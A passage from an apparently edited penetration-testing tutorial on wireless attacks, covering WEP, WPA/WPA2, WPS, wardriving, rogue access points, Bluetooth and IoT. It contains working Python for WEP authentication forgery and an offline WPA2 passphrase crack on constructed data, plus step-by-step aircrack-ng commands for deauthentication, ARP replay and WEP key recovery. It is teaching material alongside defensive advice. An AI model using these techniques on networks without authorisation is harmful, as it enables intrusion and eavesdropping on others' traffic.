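    if body[:3] != iv:
        return None
    pt = xor(body[3:], keystream)
    return pt[:-4] if pt[-4:] == icv(pt[:-4]) else None


def demo(key=bytes.fromhex("0123456789abcdef0123456789")):
    """One honest authentication, then the attack. The 104-bit key and the IV are constructed."""
    iv = b"\x11\x22\x33"
    c1 = ap_challenge()
    r1 = client_response(key, iv, c1)
    iv_seen, ks = recover_keystream(c1, r1)      # passive: only what was on the air
    c2 = ap_challenge()                           # the AP now challenges the attacker
    forged_ok = ap_verify(key, forge_response(iv_seen, ks, c2), c2)
    arp = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"who-has 192.168.1.1"   # constructed frame
    leaked = decrypt_with_keystream(iv_seen, ks, wep_encrypt(key, iv, arp))
    return {"honest_ok": ap_verify(key, r1, c1), "forged_ok": forged_ok, "leaked": leaked}


if __name__ == "__main__":
    print(demo())
```

The forgery only works because the AP reuses the IV, but WEP has only 16.7 million IVs and most drivers start at zero or pick them at random, so on a busy network repeats arrive within hours; everything the attacker learns about one IV stays valid for the life of the static key.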
Moving from WEP to WPA
After WEP was found to be terribly flawed and irreparably broken, Wi-Fi Protected Access (WPA) was introduced. WPA was designed as a firmware or driver upgrade rather than a hardware replacement, so it could run on the same RC4-capable chipsets that WEP ran on.
The most significant development introduced with WPA was TKIP. TKIP keeps RC4 but mixes a fresh per-packet key from a temporal key, a 48-bit sequence counter and the sender's address, adds a keyed message integrity check, and rekeys on a regular basis; WEP, in contrast, uses the same static key until an administrator changes it. This makes WPA much more difficult to crack than WEP, though TKIP itself is now deprecated.
WPA does suffer from the following flaws:
Weak keys chosen by the user (WPA-Personal is only as strong as its passphrase)
Packet spoofing (attacks on TKIP's integrity check allow a small number of forged packets to be injected)
Cracking WPA and WPA2
To crack WPA, a different approach must be used than with WEP. One of the best-known tools is freely available in Kali Linux: Reaver. Reaver does not attack WPA itself; it attacks Wi-Fi Protected Setup (WPS) on routers that have it enabled. The WPS PIN is validated in two halves, which shrinks the search space to roughly 11,000 attempts, and a recovered PIN makes the router hand over its WPA pre-shared key.
WPA2 is the successor to WPA, introduced to fix the defects that were part of the original. It is the Wi-Fi Alliance's certification of the full IEEE 802.11i standard and offers much-improved security over its predecessor.
WPA and WPA2 both suffer from vulnerabilities that can be exploited by you, the pentester. Each offers a way to penetrate the security of an otherwise strong protocol.
So, how can you attack WPA and WPA2?
Offline Attack This attack works by being close enough to observe the 4-way handshake between a client and the access point. The handshake is the key-confirmation exchange that takes place every time a client connects or reconnects.
The handshake never sends the pre-shared key itself, but everything else that goes into the key derivation travels in the clear: both MAC addresses, both nonces, and a message integrity code keyed by a value derived from the PSK. With those captured, the attacker can derive keys from candidate passphrases at leisure and compare the integrity codes, entirely offline and without touching the network again.
Deauthentication Attack Rather than waiting for a client to connect, the attacker sends spoofed deauthentication frames to a connected client, forcing it to drop the connection and reconnect, and captures the handshake that follows. After that it is the same offline attack. Where the AP and client both support and enforce 802.11w Protected Management Frames, deauthentication frames are authenticated and the spoofing step fails.
Extracting Keys Where a pre-shared key has been typed into each client, physical access to a client (or to its backups or configuration store) may yield the key directly.
Brute-Force WPA Keys The lowest-technology attack is to guess the key outright. Against a captured handshake this is done offline with tools such as aircrack-ng or KisMAC, with aireplay-ng supplying the deauthentication; the limiting factor is that each guess costs 4,096 rounds of PBKDF2, so long random passphrases are out of reach.
The downside of this attack is that it can take a long time or a lot of computing power to recover the key. Guessing online instead, by repeatedly trying to associate, is far slower, may lock up the access point, and is likely to set off wireless intrusion detection.
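To see exactly what the offline attack computes, here is the key derivation the cracking tools perform, as an added example written for this edit (not code from the original post or from the aircrack-ng project). It uses only the Python standard library; the SSID, MAC addresses, nonces, passphrase and wordlist are all constructed, and the EAPOL-Key frame is a simplified but correctly laid out message 2 of the 4-way handshake. simulate_capture() stands in for the sniffer's view; crack_psk() is the attacker.

```python
# Added example for this edit (not code from the original post or the aircrack-ng project).
# WPA2-PSK key derivation and EAPOL-Key MIC as specified in IEEE 802.11i, standard library only.
# SSID, MACs, nonces, passphrase and wordlist are constructed for the demo.
import hashlib
import hmac
import struct

SSID = b"CorpGuest"                                  # constructed
AP_MAC = bytes.fromhex("000c41ee1d2a")               # constructed BSSID
STA_MAC = bytes.fromhex("446057c858a0")              # constructed client MAC
ANONCE = hashlib.sha256(b"demo anonce").digest()     # 32-byte nonces, constructed
SNONCE = hashlib.sha256(b"demo snonce").digest()
MIC_OFFSET = 81      # EAPOL header (4) + key descriptor fields before the 16-byte MIC (77)
WORDLIST = [b"password", b"12345678", b"linksys1", b"sunflower42", b"letmein123"]  # constructed


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits). This is the cost of one guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf_512(key, label, data):
    """802.11i PRF: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0.., first 64 bytes.
    CCMP uses PRF-384 (first 48 bytes); the KCK in the first 16 bytes is identical either way."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK from the PMK and the four public handshake values; PTK[0:16] is the KCK that keys the MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def build_msg2(snonce, mic=b"\x00" * 16):
    """EAPOL-Key message 2 of 4: RSN descriptor, key info 0x010A (version 2 = HMAC-SHA1, pairwise, MIC)."""
    body = (b"\x02" + struct.pack(">HHQ", 0x010A, 0, 1) + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + struct.pack(">H", 0))
    return b"\x01\x03" + struct.pack(">H", len(body)) + body


def eapol_mic(kck, frame):
    """WPA2: MIC = first 128 bits of HMAC-SHA1 over the whole EAPOL frame with the MIC field zeroed."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def simulate_capture(passphrase):
    """What airodump-ng sees: both MACs, both nonces, and message 2 carrying a MIC keyed by the KCK."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    mic = eapol_mic(ptk[:16], build_msg2(SNONCE))
    return {"ap": AP_MAC, "sta": STA_MAC, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": build_msg2(SNONCE, mic)}


def crack_psk(capture, ssid, wordlist):
    """Offline dictionary attack: recompute the MIC for each guess; a match means the guess is the PSK."""
    observed = capture["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for guess in wordlist:
        if not 8 <= len(guess) <= 63:            # WPA passphrases are 8 to 63 ASCII characters
            continue
        ptk = derive_ptk(pmk_from_passphrase(guess, ssid), capture["ap"], capture["sta"],
                         capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), observed):
            return guess
    return None


if __name__ == "__main__":
    cap = simulate_capture(b"sunflower42")
    print("recovered:", crack_psk(cap, SSID, WORDLIST))
```

Two things follow from the code. The SSID is a salt, so a precomputed table only helps against networks that share a name, which is why default names such as "linksys" are worth avoiding. And PBKDF2 is the only thing standing between the attacker and the key: the nonces and MACs are public, so the passphrase's entropy is all the security there is.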
While these attacks can be carried out with Linux-based tools such as Kali Linux or the aircrack-ng suite, other options are available. A company called Pwnie Express has two devices known as the Pwn Pad and the Pwn Phone that make cracking wireless easier than ever before.
Both devices offer a built-in suite of tools used for all sorts of security audits and tests, including tools that can very quickly break WEP, WPA, and WPA2.
Both have the advantage of using off-the-shelf hardware such as the Nexus 5 and Nexus 7, which can make them very easy to hide. They also don’t look overly suspicious when they are observed by a third party. The downside is that they are rather pricey—over a thousand dollars a piece.
Though you can purchase a device such as the Pwn Pad or Pwn Phone, they may not be the best or most cost-effective option. Both can be homemade by purchasing the tablet or phone from eBay and installing the free community edition of the OS from Pwnie Express.
You could also build your own device from scratch using the much more popular Kali Linux pentesting OS in the form of Kali NetHunter.
The benefit in this route is that it works on many more devices and is more flexible, much better documented, and highly customizable—as well as being free.
Exploring Wireless Deployment Options
There are numerous ways to deploy a wireless network. As a pentester, you should be aware of these different types since they may be useful to you in planning or carrying out a test. Understanding the various types of network deployments for wireless can greatly assist you when planning your attack.
For example, being able to identify a 4G hotspot may allow you to target a user who is using their phone to establish a wireless connection while attached to a physical network.
In this case, the user may be opening up a backdoor to the main network. Targeting a site-to-site WLAN could be effective if you wish to carry out a denial-of-service attack and break connectivity between locations.
One of the common ways to create a wireless network nowadays is through the use of a 3G/4G hotspot. A 3G/4G hotspot is a wireless network that is deployed by using a special cellular-enabled access point or by using a cell phone that can be turned into an access point with a simple “push” of a button.
Encountering these devices is common; just about every smartphone has this capability as a standard function.
Networks using a cellular access point have another common property: their form factor. Many of the access points that are in this form factor are small and may come in the form of a cell phone or tablet.
This illustrates both a benefit and a security issue with these access points: they don't look like one, and they are part of a very common device. They are easily concealed, blend in with the everyday kit someone would carry, and raise no suspicion.
Extension to an existing network is the type of network deployment that uses access points that are attached to a hardwired network and allow the reach of the existing network to go further. Interestingly enough, the types of access points encountered on this type of network can be hardware or software in nature.
The latter type of access point (the software type) is typically accomplished by sharing a wireless adapter to other devices and thus allowing them to attach to the client.
Multiple access points are another commonly encountered deployment type that uses several access points to cover a large area, typically in locations such as hotels, conference centers, and schools. Much like cellular networks, this type of deployment requires each access point to overlap with its neighbours to some degree.
When it has been set up correctly, clients can roam from location to location seamlessly without losing connectivity.
A LAN-to-LAN wireless network allows networks in close but different physical locations to be connected through wireless technology.
This has the advantage of allowing connection between locations that may otherwise have to use a more expensive connectivity solution such as paying to dig up a street to lay a physical cable. This type of deployment is also sometimes referred to as a site-to-site wireless LAN (WLAN).
So how can you thwart the attacks discussed here against WEP and WPA? Beyond choosing the right encryption, the techniques commonly recommended to consumers include the following, with a note on what each actually buys you:
Use a long, complex passphrase as the key. The same rules you saw earlier for passwords apply; since the offline attack tests candidates against a captured handshake, a random passphrase of 20 or more characters puts the key out of reach of dictionary and brute-force attacks. On Enterprise networks, configure clients to validate the RADIUS server's certificate so they positively identify the network they are connecting to and do not hand credentials to a rogue AP.
Eliminate WEP and WPA and move to WPA2 (or WPA3 where supported). Use AES-CCMP; do not enable TKIP unless a legacy client forces you to.
MAC filtering on the access point keeps casual users out but not an attacker: valid MACs are visible in the clear to any sniffer and are trivially spoofed, as the MAC spoofing section later in this post shows.
Disabling SSID broadcast in your router likewise hides nothing from an attacker: the name still travels in the clear in probe responses and association requests, and survey tools reveal "hidden" networks routinely. Treat both as housekeeping, not security. With an understanding of the various security technologies, you now need to know how networks can be found in the first place.
Conducting a Wardriving Attack
Wardriving is a common means of targeting wireless networks. The attack consists of an attacker driving around an area with a computing or mobile device that has both a wireless card and software designed to detect wireless clients or access points.
In this exercise, you will set up and configure a system to perform a wardriving operation. This exercise provides the general steps and items you will need to perform this operation, but you may need to tailor certain steps for your hardware and setup where noted.
A word of caution: Keep safety and the law in mind when performing this exercise. If you choose to actually drive around using this setup, remember that you should first start the system up and get it scanning while you are stopped. You should place the notebook on the floor of the vehicle in the passenger side or back seat of the car.
Additionally, the notebook screen should never be in view of the driver unless the car is safely stopped or parked; having a computer screen in view of the driver is illegal in most states.
Perform this activity with someone else driving while you test it out. Before you start this exercise, you will need the following:
Software such as Vistumbler or KisMAC
Mapping software such as WiGLE
Hardware: a USB GPS device
A notebook with a wireless card (Note that the frequencies your wireless card supports will be the only ones you will be able to detect; if this is insufficient for your needs, you will need an external USB adapter.)
Here are the steps:
1. Install the software of your choice as defined by your operating system.
2. Register for an account on the WiGLE website in order to upload the data that you have collected regarding access points and locations.
3. Ensure that the drivers for your wireless card or adapter are updated to the latest version.
4. Install your GPS device and load the necessary drivers for your operating system.
5. Start up your software (such as Vistumbler).
6. Configure your software to recognize your GPS (if necessary).
7. Let the system run for a few moments to allow it to detect wireless networks. If successful, proceed to the next step. If not, refer to your software or hardware vendor’s website to troubleshoot and test again.
8. Drive around with the system running for a time, with the software detecting access points.
9. After a period of time, you can save a log of the activity to your hard drive.
10. Once the information is saved, you can upload it to WiGLE, which will plot out the locations on a map.
In this type of attack, wireless detection software will either listen for the beacon of a network or send off a probe request designed to detect the network. Once a network is detected, it can then be singled out for later attack by the intruder.
It is common for site survey tools to also include the ability to connect to a GPS device in order to pinpoint an access point or client within a few feet. There are also variations of the wardriving attack, all of which have the same objective:
Warflying Same as wardriving, but using a small plane or ultralight aircraft
Warballooning Same, but makes use of a balloon instead
Warwalking Involves putting the detection equipment in a backpack or something similar and walking through buildings and other facilities
Something that works with these techniques is known as warchalking, or the placement of symbols in locations where wireless signals were detected. These symbols tell the informed that a wireless access point is nearby and provide data about it, including open or closed access points, security settings, channel, and name.
Conducting Other Types of Attack
These are other ways to get at a wireless network:
Rogue access points are an effective way of breaching a network by tempting users to connect to the access point. To carry out this attack, the attacking party will set up an access point that is outside of the company’s control.
Once victims attach to the access point, they may start to transmit information (including sensitive company data) over the network, potentially compromising security.
This type of attack is very easy to perform through the use of readily available compact hardware access points as well as software-based access points. In both cases, the access points are easy to hide as well as easy to configure.
MAC spoofing defeats MAC filtering, the access point feature that restricts which client addresses may attach. The allowed MACs are visible in the clear to any sniffer, so an attacker simply copies one and sets it on their own card.
Tools such as SMAC on Windows, or ifconfig, ip link and macchanger on Linux, change the address in software; some network card drivers also allow it to be changed in their hardware configuration settings.
Misconfiguration is a common problem—many hardware and software items can be misconfigured. The owner of a device could easily misconfigure a device and reduce or negate the device’s security features.
A wireless access point provides an ideal “access anywhere” solution for attackers or other malicious parties that can’t physically connect to the network.
Client misassociation is a type of attack that starts with a victim attaching to an access point that is on a network other than their own. Because of the way wireless signals propagate through walls and many other structures, a client can easily detect another access point and attach to it either accidentally or intentionally.
In either case, a client may attach to a network that is unsafe, perhaps while still connected to a secure network.
A promiscuous client offers a strong signal intentionally for malicious purposes. Wireless cards often look for a stronger signal to connect to a network. In this way, the promiscuous client grabs the attention of the users by sending a strong signal.
Another potential attack is the process of jamming the RF signal being used by a wireless network. Jammers are available that specifically target wireless networks in both the 5 GHz and 2.4 GHz range.
This action creates an issue with the availability of the network and results in a targeted denial-of-service attack against access points in the area. It is possible to use a specially designed jammer that can transmit signals that can overwhelm and deny the use of the access point by legitimate clients.
Note that jamming, while effective, is not something that should be carried out unless explicit permission has been obtained. Deliberately blocking RF signals is illegal in most jurisdictions (in the United States the FCC prohibits the marketing, sale and operation of jammers) and can result in substantial fines.
Most jammers are only available from overseas sources. Seriously consider whether this type of test needs to be done at all and, if so, how you will obtain permission from the applicable regulatory agencies.
A honeypot attack partly relies on social engineering and an understanding of how people use technology. Users can (and do) connect to any available wireless network they can find and may inadvertently attach to a network that is malicious.
In such a situation, an attacker can attract unknowing or unsuspecting users to attach to the access point that they themselves control.
To carry out this type of attack, a malicious party must set up a rogue access point (typically in the range of legitimate ones where possible). With the rogue access point generating a much stronger and clearer signal, it is possible to attract clients looking for an access point to attach to.
Once this has taken place, a malicious attacker can choose to view, modify, or block network traffic.
Choosing Tools to Attack Wireless
Several tools and mechanisms make locating a target network easy. Once you locate a wireless network, it is possible to strike it.
Picking a Utility
The following are methods that can complement wardriving or be used on their own:
OpenSignal This app can be used on the web (its cellular coverage map) or on a mobile device. You can use it to map out Wi-Fi networks and 3G/4G networks, as well as correlate this information with GPS data.
Kismet A Linux-based tool that is effective in locating wireless networks passively, meaning that the tool does not do much to reveal its presence to those who may be looking or listening.
InSSIDer This utility can be used to locate wireless networks in an area and provide information on channels, frequency, and signal strength.
Network Signal Info This application is available for the Android operating system and can be used to both analyze and locate wireless networks.
Wireshark is a general-purpose sniffer but can also be used to capture and dissect wireless traffic. On Linux any adapter that supports monitor mode will do; on Windows, where standard drivers do not expose monitor mode, the AirPcap USB dongle was historically required. With a monitor-mode capture it is possible to analyze wireless traffic all the way down to the 802.11 frame headers.
Under ideal conditions, these tools can help locate any of the following information about a wireless network:
Presence of multiple access points
Possibility of recovering SSIDs
Authentication method used
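Every item in that list is read straight out of beacon frames, which access points transmit roughly ten times a second whether or not anyone is listening. The following is an added example written for this edit (not code from the original post or from any of the survey tools above): it parses raw 802.11 beacons for the SSID, the "hidden" case, WEP versus WPA versus WPA2, PSK versus 802.1X, and whether management frames are protected. The frame layout follows IEEE 802.11; the BSSIDs, SSIDs and frames themselves are constructed, and a real capture would come from a monitor-mode interface rather than from build_beacon().

```python
# Added example for this edit (not code from the original post or any survey tool).
# Parses raw 802.11 beacon frames for the facts a site-survey tool displays. Frame
# layout follows IEEE 802.11; the BSSIDs, SSIDs and frames are constructed.
import struct

FC_BEACON = b"\x80\x00"          # management frame, subtype 8 (beacon)
CAP_PRIVACY = 0x0010             # capability bit "Privacy": WEP when no RSN/WPA IE is present
IE_SSID, IE_RSN, IE_VENDOR = 0, 48, 221
OUI_RSN = b"\x00\x0f\xac"        # IEEE 802.11i suite selectors
OUI_WPA = b"\x00\x50\xf2"        # Microsoft OUI used by the WPA(1) vendor-specific IE
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP", 5: "WEP-104"}
AKMS = {1: "802.1X", 2: "PSK"}


def suite_body(oui, group, pairwise, akms, caps=None):
    """Layout shared by the RSN IE and the WPA vendor IE: version, group cipher,
    pairwise cipher list, AKM list, and (RSN only) a capabilities field."""
    def suites(types):
        return struct.pack("<H", len(types)) + b"".join(oui + bytes([t]) for t in types)
    body = struct.pack("<H", 1) + oui + bytes([group]) + suites(pairwise) + suites(akms)
    return body if caps is None else body + struct.pack("<H", caps)


def build_beacon(bssid, ssid, privacy, rsn=None, wpa=None):
    """Constructed beacon: 24-byte MAC header, 12 bytes of fixed fields, then tagged IEs."""
    header = FC_BEACON + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    fixed = struct.pack("<QHH", 0, 100, 0x0001 | (CAP_PRIVACY if privacy else 0))
    ies = bytes([IE_SSID, len(ssid)]) + ssid
    if wpa is not None:
        ies += bytes([IE_VENDOR, len(wpa)]) + wpa
    if rsn is not None:
        ies += bytes([IE_RSN, len(rsn)]) + rsn
    return header + fixed + ies


def parse_ies(buf):
    """Tagged parameters: one byte element ID, one byte length, then the body."""
    out, i = [], 0
    while i + 2 <= len(buf):
        eid, ln = buf[i], buf[i + 1]
        out.append((eid, buf[i + 2:i + 2 + ln]))
        i += 2 + ln
    return out


def parse_suites(body):
    """Returns (pairwise ciphers, AKMs, MFP capable, MFP required)."""
    pos = 6                                   # skip version (2) and group cipher suite (4)
    (n,) = struct.unpack_from("<H", body, pos); pos += 2
    pairwise = [CIPHERS.get(body[pos + 4 * k + 3], "?") for k in range(n)]; pos += 4 * n
    (n,) = struct.unpack_from("<H", body, pos); pos += 2
    akms = [AKMS.get(body[pos + 4 * k + 3], "?") for k in range(n)]; pos += 4 * n
    caps = struct.unpack_from("<H", body, pos)[0] if pos + 2 <= len(body) else 0
    return pairwise, akms, bool(caps & 0x0080), bool(caps & 0x0040)   # MFPC bit 7, MFPR bit 6


def classify_beacon(frame):
    if frame[:2] != FC_BEACON:
        raise ValueError("not a beacon frame")
    (cap,) = struct.unpack_from("<H", frame, 34)
    ssid, rsn, wpa = None, None, None
    for eid, body in parse_ies(frame[36:]):
        if eid == IE_SSID:
            ssid = body
        elif eid == IE_RSN:
            rsn = body
        elif eid == IE_VENDOR and body[:4] == OUI_WPA + b"\x01":
            wpa = body[4:]
    mfpc = mfpr = False
    if rsn is not None:
        pairwise, akms, mfpc, mfpr = parse_suites(rsn)
        security = "WPA2-%s (%s)" % ("/".join(akms), "/".join(pairwise))
    elif wpa is not None:
        pairwise, akms, _, _ = parse_suites(wpa)
        security = "WPA-%s (%s)" % ("/".join(akms), "/".join(pairwise))
    elif cap & CAP_PRIVACY:
        security = "WEP"
    else:
        security = "Open"
    # A "hidden" network still beacons; only the SSID element is empty or NUL-filled.
    hidden = not ssid or set(ssid) == {0}
    return {"bssid": frame[16:22].hex(":"), "ssid": "" if hidden else ssid.decode("utf-8", "replace"),
            "hidden": hidden, "security": security, "pmf_capable": mfpc, "pmf_required": mfpr}


SAMPLES = {   # constructed beacons, one per security posture discussed in the text
    "open-hidden": build_beacon(bytes.fromhex("000c41ee1d2a"), b"", privacy=False),
    "wep": build_beacon(bytes.fromhex("00095b6f641e"), b"linksys", privacy=True),
    "wpa-tkip": build_beacon(bytes.fromhex("001122334455"), b"OldShop", privacy=True,
                             wpa=OUI_WPA + b"\x01" + suite_body(OUI_WPA, 2, [2], [2])),
    "wpa2-psk": build_beacon(bytes.fromhex("0a1b2c3d4e5f"), b"CorpGuest", privacy=True,
                             rsn=suite_body(OUI_RSN, 4, [4], [2], caps=0x0080)),
    "wpa2-ent": build_beacon(bytes.fromhex("0a1b2c3d4e60"), b"Corp", privacy=True,
                             rsn=suite_body(OUI_RSN, 4, [4], [1], caps=0x00C0)),
}

if __name__ == "__main__":
    for name, frame in SAMPLES.items():
        print(name, classify_beacon(frame))
```

The pmf_required flag is the one to check before planning a deauthentication attack: on a network that enforces 802.11w, spoofed deauthentication frames are discarded and the handshake has to be caught the slow way.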
Choosing the Right Wireless Card
If you are going to analyze and interact with wireless networks as a pentester, you need to consider the wireless card or adapter that you will be using. For the majority of wireless cards you will not have to think much about the make, model, and manufacturer; most are compatible with the tools and techniques you will use.
However, in the case of mobile devices such as tablets and cell phones, which may use Wi-Fi, the internal adapters typically do not support the advanced features you need. This situation necessitates the use of external adapters.
When purchasing a wireless adapter, consider the following:
The operating system in use
Application in use
Whether packet injection is required (standard Windows drivers do not support monitor mode or packet injection; if injection is required, use Linux)
Manufacturer of wireless card and chipset (you must know both since the two can be made by different manufacturers, and it is the chipset and its driver that determine monitor-mode and injection support)
Whether the adapter supports both monitor and promiscuous modes. If you are using virtualization, you will also need a USB adapter that can be passed through to the guest, since a laptop's built-in card is not visible as a wireless card from inside a VM.
Let’s put this all together and try breaking WEP using Linux.
In this exercise, you will use Linux with a few tools to crack and retrieve a WEP key. The version of Linux you will use for this exercise is Kali 2.0 and you won’t use virtualization.
(If you choose to use virtualization, you will need to obtain a USB wireless adapter and consult your virtualization software to configure the adapter to be recognized as a wireless card.)
1. Obtain information about your wireless card by running the command iwconfig (or, on current releases, iw dev) from the Terminal window.
If your wireless card is detected by your operating system, its interface name will start with the prefix "wlan," followed by a number.
In most cases, the numbering will start with zero (i.e., wlan0) and will count up from there.
2. Put the wireless adapter into monitor mode so it can pick up all traffic on a channel, not just frames addressed to it:
airmon-ng start wlan0
where wlan0 is the name your adapter was given. Older aircrack-ng releases create a monitor interface called mon0; current releases call it wlan0mon. Use whichever name airmon-ng reports in the commands that follow (mon0 is used below, as in the original exercise).
3. Survey the networks in the area:
airodump-ng mon0
4. In the list of networks, locate your target network, note its BSSID and channel, and stop the survey with Ctrl+C.
5. Using airodump-ng, lock onto the target's channel and write the capture to disk; aircrack-ng works from the file, so the -w option is required:
airodump-ng -c [channel] --bssid [bssid] -w [file prefix] [monitor interface]
airodump-ng -c 11 --bssid 00:09:5B:6F:64:1E -w wepcap mon0
This produces wepcap-01.cap in the current folder.
6. Wait for a client to connect and note its MAC address from the STATION column; the access point only accepts injected frames from an address it considers associated, so you will spoof that client. If no client shows up, associate your own MAC with a fake authentication instead:
aireplay-ng -1 0 -e [ESSID] -a [bssid of AP] -h [your MAC] [interface]
7. Generate the traffic you need with an ARP request replay. aireplay-ng listens for an ARP request from the network and reinjects it thousands of times; every retransmission is encrypted under a new IV, which is exactly what cracking WEP requires:
aireplay-ng -3 -b [bssid of AP] -h [MAC of client] [interface]
aireplay-ng -3 -b 00:09:5B:6F:64:1E -h 44:60:57:C8:58:A0 mon0
The number after aireplay-ng selects the attack (-3 is ARP request replay, -1 is fake authentication); it is not a channel. The channel was already fixed by airodump-ng.
8. Watch the #Data column in the airodump-ng window climb. The original rule of thumb was 100,000+ packets; with the PTW attack in current aircrack-ng, 40,000 to 85,000 IVs usually suffice for a 104-bit key. Once you have enough, stop both tools with Ctrl+C.
9. To recover the key, point aircrack-ng at the capture:
aircrack-ng wepcap-01.cap
If you have captured enough IVs, aircrack-ng displays the key on your screen, usually in hexadecimal.
Simply take that hex key and enter it when connecting to the AP and you should be on the network.
Knocking Out Bluetooth
Wi-Fi isn’t the only wireless technology on the block—we can’t leave out Bluetooth. Bluetooth is a series of specifications that refer to a short-range technology that is used to create personal area networks (PANs). This technology is extremely common nowadays and appears in everything from mobile phones to cars and game controllers.
Bluetooth is designed to be a universal standard for communications for devices of all types. The communication protocol operates in the 2.4 to 2.485 GHz band and was developed in 1994 by Ericsson Corp.
Under normal conditions, Bluetooth has a distance of about 30 feet or 10 meters. However, manufacturers can choose to implement measures or features in their products to increase the range of their products substantially. With special antennas, you can extend the range even further.
The process through which two Bluetooth-capable devices connect to each other is known as pairing. Two devices can pair as long as they support a common profile (a headset pairs with a phone, not with another headset).
To do this, a device will typically need to be discoverable so it can transmit its name, class, offered services, and other details. When devices pair, they will exchange a pre-shared secret or link key. They store this link key to identify each other for future pairings.
Much like an Ethernet MAC address, every Bluetooth device has its own unique 48-bit address (the BD_ADDR) and generally an assigned, human-readable name.
Once paired, Bluetooth devices create a piconet (or very small net). In a piconet, there is one master and up to seven active slaves at any one time. Because of the way Bluetooth devices work, the chances of any two devices sharing the same channel or frequency is very low and therefore conflicts are kept to a minimum.
Bluetooth's short range is often taken to be a security feature, and that perception is the problem.
Many users of Bluetooth-enabled devices believe that, because the technology is so short range, it is impervious to attack since attackers would need to be within visual range.
This is not true. Directional antennas extend the practical range well beyond the nominal 10 meters, and all an attacker needs is the software, a suitable adapter, and some basic knowledge.
So, how good is Bluetooth security? Well, that’s a question still open to debate, but in general, security is limited to a few techniques. First, frequency hopping— a process in which the frequency is changed at regular intervals during communication—is used to prevent conflicts or other issues.
Both the master and slave know the frequency hopping algorithm, but the outsider does not and therefore should not be able to get the correct frequency easily. Second, a preshared key is exchanged at a pairing that is used for authentication and encryption (128-bit).
The classic Bluetooth security modes are
Security Mode 1 No active security.
Security Mode 2 Service-level security. A centralized security manager handles authentication, configuration, and authorization after the link is established. This mode may not be activated by the user, and there is no device-level security.
Security Mode 3 Device-level security that is always on. Authentication and encryption are based on a secret link key and are enforced before the link is set up.
Security Mode 4 Added in Bluetooth 2.1 with Secure Simple Pairing: service-level security like mode 2, but pairing uses Elliptic Curve Diffie-Hellman key agreement rather than a PIN. This is what current devices use.
Much like with wardriving, an attacker who has the software installed on their mobile phone, laptop, or netbook will know which ones to target.
All the hacker has to do is to walk around in public places and let their software do all the work, or they can sit down in a hotel reception or restaurant pretending that they are working.
The whole process is automatic for the hacker because the software in use will scan nearby surroundings for Bluetooth devices.
When the hacker's software finds and connects to a vulnerable Bluetooth-enabled phone (the classic flaws affected older handsets that accepted OBEX or AT-command connections without pairing), it can download contact information, phone numbers, calendars, photos, and SIM-card details; place calls at the victim's expense; eavesdrop on calls; and much more.
Types of Bluetooth Attacks
Let’s take a look at some of the attacks you can perform using Bluetooth:
Bluesnarfing The process of gaining unauthorized access to a device and downloading information (contacts, calendar, messages) from it. In an extreme case bluesnarfing also lets the attacker write to the device, corrupting or destroying its data.
Bluebugging An attack in which an attacker plants software on a device that allows it to become a bugging device on demand. Once your device is bluebugged, the hacker can listen in on anything you and anyone around you are saying.
Bluejacking The process of sending unsolicited messages to a Bluetooth-enabled device; akin to spamming.
Bluesniffing The attacker is capable of viewing information as it flows to and from a Bluetooth-enabled device.
Many of these attacks can be carried out with specialized software and the right hardware. For Bluetooth you need an adapter whose range lets you stay out of sight of the victim; a number of adapters with an external antenna connector extend the range of transmissions to over 1,000 feet.
Things to Remember About Bluetooth
When working with Bluetooth devices, you should keep some specifics in mind about the devices and how they operate. First, the device can operate in one of the following modes:
Discoverable This allows the device to be scanned and located by other Bluetooth-enabled devices.
Limited Discoverable In this mode, the device will be discoverable by other Bluetooth devices for a short period of time before going back to being nondiscoverable.
Nondiscoverable As the name suggests, devices in this mode do not answer inquiry scans and cannot be located by other devices. However, a device that already knows the address, because it paired or connected earlier, can still connect directly.
In addition to the device being able to be located, it can be paired with other devices to allow communication to occur. A device can be in pairing or nonpairing mode. In pairing mode, it can link with another device.
Hacking the Internet of Things (IoT)
We can’t finish up this blog without discussing something that you need to check for as a pentester: the Internet of Things (IoT). The IoT is a buzzword used to refer to the increasing numbers of objects that can connect to the Internet that don’t fit nicely into the category of computers or other devices.
For example, objects such as appliances, sensors, home automation systems, vehicle media systems, wearable computing devices, and more all come in variations that connect to the Internet for data exchange purposes.
Such systems typically have an embedded OS and a wireless or wired card that can be configured to attach to a home or business network.
The problem with these devices from a security standpoint is simply that most of them have little or no security. Many were designed to offer a specific function to the consumer or business, and typically this means that little or no attention was given to security: default credentials, unauthenticated services, and firmware that is never updated are the norm.
Poor or missing security measures can be the bane of network admins—and a potential entry point for you as a penetration tester.
From a pentest standpoint, you may want to use your tools to scan for wireless-enabled devices to see if you can identify an IoT device. Once you find such a device, you can attempt banner grabs or port scans to see if you can identify the device.
If you can identify it, do your research to see if you can find potential entry points or vulnerabilities you can exploit. If done right, you can use a compromised device as a pivot point, or a launching point, for deeper strikes into a target network.
From a defensive perspective, these devices should not only be evaluated for security issues, but also placed on their own special network segment. To improve security, any object that needs to be directly accessible over the Internet should be segmented into its own network and have its network access restricted.
The network segment should then be monitored to identify potential anomalous traffic, and action should be taken if there is a problem.
